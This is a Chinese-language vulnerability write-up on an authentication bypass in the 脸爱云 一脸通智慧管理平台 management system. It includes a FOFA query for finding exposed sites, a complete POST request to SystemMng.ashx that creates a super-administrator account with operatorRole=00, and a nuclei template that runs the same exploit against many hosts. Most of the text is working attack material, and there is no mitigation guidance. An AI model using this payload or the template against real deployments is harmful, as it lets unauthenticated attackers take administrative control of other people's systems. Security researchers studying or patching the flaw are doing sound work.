漏洞描述

脸爱云一脸通智慧管理平台1.0.55.0.0.1及其以下版本SystemMng.ashx接口处存在权限绕过漏洞,通过输入00操纵参数operatorRole,导致特权管理不当,未经身份认证的攻击者可以通过此漏洞创建超级管理员账户。

fofa语句


title="欢迎使用脸爱云 一脸通智慧管理平台"

漏洞复现

打开网站

1703665942311.png

构造payload访问

POST /SystemMng.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Connection: close
Upgrade-Insecure-Requests: 1

operatorName=changge&operatorPwd=changge&operpassword=changge&operatorRole=00&visible_jh=%e8f%b7%e9%80%89%e6%8b9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

成功添加用户changge:changge

1703666028481.png

登录

1703666078453.png

nuclei批量探测

1703667558147.png

id: lianaiyun-userinfo

info:
  name: 脸爱云任意用户注册漏洞
  author: changge
  severity: info
  description: description
  reference:
    - https://
  tags: tags

requests:
  - raw:
      - |-
        POST /SystemMng.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 175
        Connection: close
        Upgrade-Insecure-Requests: 1

        operatorName=changge&operatorPwd=changge&operpassword=changge&operatorRole=00&visible_jh=%e8f%b7%e9%80%89%e6%8b9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: status
        status:
          - 200